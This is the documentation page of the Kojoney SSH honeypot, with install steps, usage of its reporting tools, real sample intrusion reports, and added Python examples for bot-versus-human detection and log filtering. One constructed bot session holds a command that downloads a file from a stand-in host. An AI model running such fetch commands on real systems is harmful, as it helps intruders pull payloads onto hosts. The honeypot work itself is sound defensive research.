Kojoney - A Honeypot for the SSH Service

What is kojoney?

Kojoney is a low-interaction honeypot that emulates an SSH server. The daemon is written in Python using the Twisted Conch libraries.

Why the name kojoney?

Kojoney is a blend of the Spanish word cojon (s/c/k/) and honey. In Spanish the expression "estar hasta los cojones" means that you are fed up. In the past I received many attacks against my SSH server, and several of them were quite clever (for example, brute forcing my SSH server with my first name and surname). In order to catch my attacker I decided to write a honeypot. The attacker stopped his attempts and (to this day) I don't know who the attacker was, but I realised that this tool was quite useful and decided to release it to the public.

Who is the author of kojoney?

Me :) The author of the project is -officially- Jose Antonio Coret (please, for the love of god, call me Joxean), also known as Joxean Koret. You can contact me at joxeankoret N0SP4M at n0$p4m yah00 D0T es.

Which is the license of kojoney?

Kojoney is released under the GNU General Public License version 2 (the GPL).

Does it work under Win32?

Yes, I have tested it under Cygwin and with ActiveState Python at work, but due to the lack of a Windows machine at home no packages have been released for M$ Windows environments.

Any volunteer?

In fact, Kojoney should work on any platform that Python supports. Please take a look at the following location to see whether your operating system is supported (is there any COMMON operating system on which Python is not supported yet?).

I found a bug!

If you have found a bug in Kojoney, please report it here. If the bug is a security bug, don't hesitate to contact me privately at my e-mail address joxeankoret N0SP4M at n0$p4m yah00 D0T es.

Where can I download the source of kojoney?

Follow the link in the Download section below.

Download

Dependencies

In order to run kojoney you need to meet various prerequisites (dependencies, if you prefer). The following is a list of the currently known prerequisites:

There are also various optional prerequisites. The following is the list of optional prerequisites (strongly recommended anyway):

Installing Kojoney

You don't need to install it. You can untar (or unzip) the package kojoney-XXX.tar.gz and run the Python script 'kojoney.py', but you will need to have (or install manually) the prerequisites listed above.

Anyway, the recommended way is to install it, and to do so you can use the supplied install script called INSTALL.sh.

Installing Kojoney with the install script


To install kojoney using the install script follow these steps:

  • Install all the prerequisites (listed in the previous paragraphs).
  • Download the latest kojoney package. Currently kojoney-0.0.3.2.zip (or a previous version).
  • Copy it to a temporary directory (e.g. /tmp/kojoney)
  • Unzip (or untar) the package
$ tar -xvzf kojoney-0.0.3.1.tar.gz (or unzip kojoney-0.0.3.2.zip)
(...)
$ ls
kojoney  kojoney-0.0.3.1.tar.gz
  • Enter the 'kojoney' directory and (as the root user on a Unix-like OS) type "sh INSTALL.sh". 
  • Follow the wizard.
The following is a sample of a successful installation using INSTALL.sh:

$ su
password:
# sh INSTALL.sh
Kojoney Honeypot installer.

Press enter to view the license agreement ...
<<< NOTE: After reading the license agreement press 'q' to exit >>>
Do you accept the ZPL, MIT and GPL license terms (yes/no) ?
yes
All licenses accepted.
******************************************
 Kojoney Honeypot Installer version 0.0.3
******************************************

Step 1 - Copying files
    (... uninteresting information...)
Step 2 - Building libraries
 [+] Building and installing [IP-Country]
 [+] Building and installing [Geograpy-Countries]
 [+] Building and installing [Zope Interfaces]
 [+] Building and installing [Twisted extension]
 [+] Building and installing [PyCrypto]
    (... Possibly various warnings. You can ignore these safely...)
 [+] Building and installing [Twisted Conch extension]
Step 3 - Installing documentation
 [+] Installing man pages
Step 4 - Changing permissions and creating symbolic links
 [+] Creating symlinks

Step 5 - Final questions and fun

Do you want to run it automatically at boot time (yes/no)?
yes

***No run levels were assigned. You need to do this manually.***

Do you want to run it now (yes/no)?
yes
Starting daemon


Kojoney installation finished.



And how can I uninstall it?

To uninstall it use the script called UNINSTALL.sh distributed with the kojoney package.

How can I start the daemon?

Without installing it, simply enter the extracted kojoney directory and type "./kojoney.py" at the shell prompt. But remember that you will need to have the prerequisites.

And how can I start it automatically at boot time?

In order to start it automatically at boot time you need to install kojoney with the script INSTALL.sh. When the installer asks whether you want to run it automatically at boot time, answer yes. This copies the startup script kojoney into the /etc/init.d directory.

Now assign the run levels in which you want it to run. This is distribution dependent and is explained below.

How can I start kojoney automatically in Debian?

After a successful installation of kojoney type the following commands as root in a terminal. Note that SysV init only runs links whose names start with S (start) or K (kill) followed by a sequence number, so the links must be named accordingly rather than simply placed in the rcN.d directories:

# ln -s /etc/init.d/kojoney /etc/rc2.d/S99kojoney
# ln -s /etc/init.d/kojoney /etc/rc3.d/S99kojoney
# ln -s /etc/init.d/kojoney /etc/rc5.d/S99kojoney

Alternatively, let Debian's own tool create the links in the default run levels:

# update-rc.d kojoney defaults

How can I start kojoney automatically in Redhat?

After a successful installation of kojoney type the following command as root in a terminal:

# /sbin/chkconfig --level 345 kojoney on

Where is the kojoney log file?

By default kojoney daemon output will be redirected to the file /var/log/honeypot.log.

How can I generate activity reports?

Use the commands 'kojreport' and 'kojreport-filter' as follows:

# kojreport /var/log/honeypot.log 0 0 1 > /tmp/report.txt

If you only want to generate a report for a single IP address or for a specific date, use the command 'kojreport-filter' as follows:

# kojreport-filter /var/log/honeypot.log '<desired ip address or date>' 0 0 1

Where is the report utility documentation?

If you installed it using the install script you can view the documentation of kojreport and kojreport-filter by typing man kojreport or man kojreport-filter in a terminal.

Otherwise, you will find the HTML versions of the man pages in the doc/html directory of the kojoney package.

You can also view the html versions of the man pages online:

Any example reports, please?

The following is a real plain text sample report.


I like reports with graphics and pie charts

I will write a new report generator utility that creates HTML reports with graphics and pie charts. Or maybe someone else will create a PHP frontend for it... Maybe...

I want to view more reports!

Take a look to the following big report: big-report.

Uh! The reporting tool recognizes humans!?

Yes, it does. But, of course, not every time.

How is it possible to recognize whether a session was opened by a bot or by a human?

We humans are clumsy. The script looks for DEL (SUPR) and BACKSPACE characters in the executed commands: a bot sends a finished command string, while a person typing at a terminal makes and corrects mistakes.

The script also checks whether the intruder tried to change the terminal window size or tried to forward X11 requests, both of which are requests an interactive client sends on behalf of a person sitting at a terminal.
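The following is an added example of the heuristics described above, written for this page and not taken from kojoney's kojhumans tool. It assumes the honeypot log has already been parsed into per-session records (the Session class and the sample sessions below are constructed for the example). A session is flagged as human if any executed command contains a BACKSPACE (0x08), a DEL (0x7f) or the xterm Delete-key escape sequence, or if the session carried a window-change or X11 forwarding request; the two reporting functions mirror the --by-session and --by-ip views.

```python
"""Human-vs-bot heuristics for SSH honeypot sessions.

Added example (not kojoney's own kojhumans code). Input is assumed to be
already parsed into Session records; the sample data is constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Control characters a person leaves behind while editing a command line:
# BACKSPACE (0x08), DEL / "Supr" (0x7f) and the escape sequence an xterm
# sends for the Delete key (ESC [ 3 ~). A bot normally pastes a finished
# command string and never emits any of these.
_EDIT_KEYS = re.compile(r"[\x08\x7f]|\x1b\[3~")


@dataclass
class Session:
    session_id: int
    source_ip: str
    commands: List[str] = field(default_factory=list)
    window_size_changes: int = 0      # SSH "window-change" channel requests
    x11_forward_requests: int = 0     # SSH "x11-req" channel requests


def human_indicators(session: Session) -> List[str]:
    """Return the list of reasons this session looks interactive (empty for a bot)."""
    reasons = []
    if any(_EDIT_KEYS.search(cmd) for cmd in session.commands):
        reasons.append("editing keys (BACKSPACE/DEL) inside a command")
    if session.window_size_changes:
        reasons.append("terminal window size change")
    if session.x11_forward_requests:
        reasons.append("X11 forwarding request")
    return reasons


def is_human(session: Session) -> bool:
    return bool(human_indicators(session))


def humans_by_session(sessions: List[Session]) -> List[int]:
    """Equivalent of --by-session: ids of sessions that look human."""
    return [s.session_id for s in sessions if is_human(s)]


def humans_by_ip(sessions: List[Session]) -> List[str]:
    """Equivalent of --by-ip: source addresses with at least one human session."""
    return sorted({s.source_ip for s in sessions if is_human(s)})


# Constructed sample sessions (not from a real honeypot log).
SAMPLE_SESSIONS = [
    # Typed "ls -la", pressed DEL twice, then typed "a": a person correcting a typo.
    Session(0, "127.0.0.1", commands=["ls -la\x7f\x7fa", "uname -a"]),
    # Clean, scripted command list with nothing else: a bot.
    Session(1, "192.0.2.10", commands=["id", "uname -a", "wget http://192.0.2.10/x"]),
    # The client resized its xterm after logging in.
    Session(5, "198.51.100.7", commands=["id"], window_size_changes=1),
    # The client asked for X11 forwarding.
    Session(1682, "198.51.100.7", commands=["cd home", "ls -a"], x11_forward_requests=1),
]

if __name__ == "__main__":
    for s in SAMPLE_SESSIONS:
        verdict = "human" if is_human(s) else "bot"
        print(f"session {s.session_id} from {s.source_ip}: {verdict} {human_indicators(s)}")
    print(f"{len(humans_by_session(SAMPLE_SESSIONS))} human session(s) total")
```

The heuristics are only indicators, which is why the tool is "not right every time": a bot driving a pseudo-terminal through a tool such as expect can send a window-change request, and a person who pastes a prepared command and never touches the keyboard leaves no editing characters at all.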

Using kojhumans, the tool that tells humans and bots apart.

As of Kojoney v0.0.2 the tool kojhumans is distributed with the package. The syntax of this tool is as follows:

$ /usr/share/kojoney/kojhumans <logfile> {--by-session|--by-ip}

The following is the result of running the tool against my home log file:

/usr/share/kojoney/kojhumans /var/log/honeypot.log --by-ip
Human detected at 127.0.0.1 (**, Intranet address)
Human detected at 82.77.71.107 (RO, Romania)

2 human(s) total

/usr/share/kojoney/kojhumans /var/log/honeypot.log --by-session
Session with id 0 opened by a human
Session with id 5 opened by a human
Session with id 1682 opened by a human

3 human session(s) total

To search for the data of a specific session refer to the section called How to search for a specific session?.

What username/password combinations are allowed to connect to the honeypot?

The most widely used username and password combinations. You can view and/or edit the credentials stored in the file /etc/kojoney/fake_users (if you installed it using the installer) or by editing the file fake_users distributed with the kojoney package. Note that every combination in that file lets an attacker into the emulated shell, so it defines how "easy" the honeypot looks; a list that accepts anything is a tell-tale sign of a honeypot.

How to search for a specific session?

To search for a specific session you need to use the tool kojsession (distributed as of kojoney 0.0.2). The following are usage examples:

$ /usr/share/kojoney/kojsession /var/log/honeypot.log -total
7258 session(s)

OK, there are a total of 7258 sessions in our log file. Sessions are numbered sequentially, so the logged sessions will have ids 0, 1, 2, 3, etc. In this example we will look at a session opened by a human. The session has id 1682, so the command that we need to run is as follows:

$ /usr/share/kojoney/kojsession /var/log/honeypot.log 1682

This will output a report for session 1682, as we can see below:

Kojoney Honeypot Report
-----------------------

Date: lun 01 ago 2005 23:56:15 CEST
Log lines: 31
Log size: 4,0K /tmp/tmp.6pM2Df

Authenticated users. Successfull logons
---------------------------------------

      1 ftp

Total 1

Logons with null passwords
--------------------------

      1 ftp

Total 1

Logons with or without password
-------------------------------

      2 ftp
      1 tiffany

Total 3

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------

      2 id
      1 whoami
      1 w
      1 uptime
      1 ls -a
      1 cd home

Total 7

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 1

IP Addresses
------------

   1    82.77.71.107 - 1 conexion(es)

Total 1

Sessions opened by humans
-------------------------
Session with id 1682 opened by a human

1 human session(s) total

Humans detecteds by IP
----------------------
Human detected at 82.77.71.107 (RO, Romania)

1 human(s) total

Internal Honeypot Errors
------------------------
Total 0


What information did we collect?
  1. We know that the attacker got into our honeypot by using the username and password combination ftp/ftp.
  2. He or she also tried to log on with the user ftp and no password, and also with the username tiffany.
  3. He or she tried to execute the commands "id" (two times), "whoami", "w", "uptime", "ls -a" and "cd home". 
  4. The intruder changed the remote terminal window size during the intrusion (looking at the log file in raw mode I found the attacker was using a simple xterm).
  5. The attacker was a human.
  6. The attacker came from Romania, more precisely from around Craiova (thanks to the extremely cool tool xtraceroute).
Isn't this reporting tool cool? :)

How to search for a specific IP address?

As of kojreport 0.0.2 you can use the tool kojreport-filter. The syntax of the tool is the same as that of the kojreport tool but with an extra second parameter, the filter. The following is the syntax of the kojreport-filter utility:

$ kojreport-filter <log file> <filter> <traceroute> <nmap> <country resolution>

The filter is a regular expression matched against the log lines, so when filtering on an IP address remember that an unescaped '.' matches any character. The <traceroute> and <nmap> flags make the report tool actively probe the attacker's hosts from your machine; leave them at 0 unless you accept that those hosts will see traffic coming back from the honeypot.

And the following is a sample report for the IP address 209.152.166.77:

Kojoney Honeypot Report
-----------------------

Date: mar 02 ago 2005 00:09:40 CEST
Log lines: 35679
Log size: 3,5M /tmp/tmp.JbRsEU

Authenticated users. Successfull logons
---------------------------------------

      2 root
      2 admin
      1 webmaster
      1 web
      1 user
      1 test
      1 oracle
      1 mysql
      1 guest
      1 administrator

Total 12

Unauthenticated users. Failed logons
------------------------------------
Total 0

Users successfully authenticateds with publickey
------------------------------------------------
Total 0

Users unsuccessfully authenticateds with publickey
--------------------------------------------------
Total 0

Logons with null passwords
--------------------------
Total 0

Logons with or without password
-------------------------------

   3421 root
     11 admin
     11 adam
     10 ellen
      9 ronald
      9 paul
      9 mail
      9 jack
      9 guest
      9 francis
      9 eric
      9 danny
      9 alex
      8 apple
      7 user
      7 adrian
      6 white
      6 webster
      6 viper
(...about 1400 other username/password combinations..)
      1 dakota
      1 Christ
      1 chicago
      1 arbgirl_phpbb1
      1 apple1
      1 alan
      1 absurdir_deadphp

Total 5070

Number of times a remote shell was opened
-----------------------------------------

Total 12

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------
Total 0

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 0

IP Addresses
------------

   1    209.152.166.77 - 5093 conexion(es)

Total 1

IP Addresses and Countries
--------------------------

   1    209.152.166.77 - US, United States

Total 1

Sessions opened by humans
-------------------------
0 human session(s) total

Humans detecteds by IP
----------------------
0 human(s) total

Internal Honeypot Errors
------------------------
Total 0

This was clearly an automated attack launched by a bot from the United States.

How to search for a specific date and/or date range?

Use the same tool as in the previous section and as a filter specify a regular expression that matches your date range. For example:

$ kojreport-filter /var/log/honeypot.log '^2005/07/30' 0 0 1
Kojoney Honeypot Report
-----------------------

Date: mar 02 ago 2005 00:20:53 CEST
Log lines: 61066
Log size: 4,7M /tmp/tmp.MG7QZj

Authenticated users. Successfull logons
---------------------------------------

      3 root
      2 test
      2 admin
      1 webmaster
      1 web
      1 user
      1 oracle
      1 mysql
      1 guest
      1 administrator

Total 14

Unauthenticated users. Failed logons
------------------------------------

   3419 root
     11 adam
     10 ellen
      9 ronald
      9 paul
      9 mail
      9 jack
      9 francis
      9 eric
      9 danny
      9 alex
      9 admin
      8 guest
      8 apple
      7 adrian
      6 white
      6 webster
      6 viper
      6 user
      6 stephanie
      6 russ
      6 philip
      6 mike
      6 matt
      6 martin
      6 kayla
      6 jerry
      6 james
(...to many tries...)
      1 chicago
      1 arbgirl_phpbb1
      1 apple1
      1 alan
      1 administrator
      1 absurdir_deadphp

Total 5058

Logons with null passwords
--------------------------

      1 root

Total 1

Logons with or without password
-------------------------------

   3423 root
     11 admin
     11 adam
     10 ellen
      9 ronald
      9 paul
      9 mail
      9 jack
      9 guest
      9 francis
      9 eric
      9 danny
      9 alex
      8 apple
      7 user
      7 adrian
      6 white
      6 webster
      6 viper
      6 stephanie
      6 russ
      6 philip
      6 mike
      6 matt
(...and more combinatios again...)
      1 arbgirl_phpbb1
      1 apple1
      1 alan
      1 absurdir_deadphp

Total 5073

Number of times a remote shell was opened
-----------------------------------------
Total 14

X11 forward requests
--------------------
Total 0

Executed different commands
---------------------------
Total 0

Number of times the intruder tries to change the terminal window size
---------------------------------------------------------------------
Total 0

IP Addresses
------------

   1    209.152.166.77 - 5093 conexion(es)
   2    172.179.184.30 - 1 conexion(es)
   3    82.43.139.111 - 1 conexion(es)

Total 3

IP Addresses and Countries
--------------------------

   1    209.152.166.77 - US, United States
   2    172.179.184.30 - US, United States
   3    82.43.139.111 - GB, United Kingdom

Total 3

Sessions opened by humans
-------------------------
0 human session(s) total

Humans detecteds by IP
----------------------
0 human(s) total

Internal Honeypot Errors
------------------------
Total 0

On 2005/07/30 I received various (all automated) attacks from the United States and the United Kingdom; only 14 remote shells were opened and not a single command was executed.
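The following is an added example of the regex filtering used by the two previous sections (filtering by IP address and by date), written for this page and not kojoney's own kojreport-filter code. The only property of the real log it relies on is that lines begin with the date as YYYY/MM/DD, which is what the '^2005/07/30' filter above depends on; the rest of the line layout and all of the sample lines are constructed for the example. It also shows why an IP address should be escaped and anchored before being used as a filter.

```python
"""Regex filtering and tallying of SSH honeypot log lines.

Added example (not kojoney's reporting code). The line layout below is an
assumption made for the example; only the leading YYYY/MM/DD date is taken
from the page. SAMPLE_LOG is constructed, not a real capture.
"""
import re
from collections import Counter

# Assumed line layout: "<date> <time> [<ip>] <event>".
LINE = re.compile(
    r"^(?P<date>\d{4}/\d{2}/\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"\[(?P<ip>[^\]]+)\] (?P<event>.*)$"
)
LOGIN = re.compile(
    r"^login attempt \[(?P<user>[^/\]]*)/(?P<password>[^\]]*)\] "
    r"(?P<result>succeeded|failed)$"
)

SAMPLE_LOG = """\
2005/07/30 10:15:02 [209.152.166.77] login attempt [root/123456] failed
2005/07/30 10:15:03 [209.152.166.77] login attempt [root/] failed
2005/07/30 10:15:04 [209.152.166.77] login attempt [root/root] succeeded
2005/07/30 10:15:05 [209.152.166.77] shell opened
2005/07/30 10:16:00 [82.43.139.111] login attempt [admin/admin] failed
2005/08/01 23:50:00 [82.77.71.107] login attempt [ftp/ftp] succeeded
2005/08/01 23:50:01 [82.77.71.107] shell opened
2005/08/01 23:50:05 [82.77.71.107] command: id
2005/08/01 23:50:09 [82.77.71.107] command: ls -a
2005/08/01 23:55:00 [182.77.71.107] login attempt [root/toor] failed
""".splitlines()


def filter_lines(lines, pattern):
    """Keep the lines matching a regular expression (kojreport-filter's second argument)."""
    rx = re.compile(pattern)
    return [ln for ln in lines if rx.search(ln)]


def ip_filter(ip):
    """Build a safe filter for one address: escape the dots and anchor on the brackets,
    otherwise '82.77.71.107' also matches 182.77.71.107 or 82x77y71z107."""
    return r"\[" + re.escape(ip) + r"\]"


def summarise(lines):
    """Tally the same kinds of figures the kojreport tools print."""
    rep = {
        "successful": Counter(),     # user -> successful logons
        "failed": Counter(),         # user -> failed logons
        "null_password": Counter(),  # user -> logons attempted with an empty password
        "shells": 0,                 # remote shells opened
        "commands": Counter(),       # command -> times executed
        "connections": Counter(),    # ip -> login attempts (one connection per attempt here)
    }
    for ln in lines:
        m = LINE.match(ln)
        if not m:
            continue  # skip lines in another layout (daemon chatter, tracebacks)
        ip, event = m["ip"], m["event"]
        lm = LOGIN.match(event)
        if lm:
            rep["connections"][ip] += 1
            rep["successful" if lm["result"] == "succeeded" else "failed"][lm["user"]] += 1
            if lm["password"] == "":
                rep["null_password"][lm["user"]] += 1
        elif event == "shell opened":
            rep["shells"] += 1
        elif event.startswith("command: "):
            rep["commands"][event[len("command: "):]] += 1
    return rep


def report(lines, pattern):
    """Filter then summarise, i.e. 'kojreport-filter <log> <pattern> 0 0 0' without probing."""
    return summarise(filter_lines(lines, pattern))


if __name__ == "__main__":
    for label, pattern in (("2005/07/30", "^2005/07/30"),
                           ("82.77.71.107", ip_filter("82.77.71.107"))):
        r = report(SAMPLE_LOG, pattern)
        print(f"{label}: {sum(r['successful'].values())} successful logons, "
              f"{sum(r['failed'].values())} failed, {r['shells']} shell(s), "
              f"{sum(r['commands'].values())} command(s)")
```

Anchoring the date with '^' keeps a filter such as '^2005/07/30' from matching a date that merely appears later in a line (for example inside a command an attacker typed), and the same reasoning applies to the IP filter: the unescaped form matches one extra line in the sample, the escaped and bracketed form does not.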

Where can I get more information about honeypots?

The following is a list of locations where you will find interesting information about honeypots:

Thanks

Thanks to Bollofino for the good logo he truly made.
Thanks to Defero.tk for the translations and also for the good logo he made. (Don't take a look at http://defero.tk  :P).
Thanks to barrapunto.com.
Thanks to my f* confusions.
Thanks to my girlfriend for her patience. What a cruel life... Or not :)
Thanks to the Savane people for the CSS.
Thanks to the sourceforge.net people.

And, of course, thanks to all my attackers for their selfless help.

Do you want to view a live honeypot?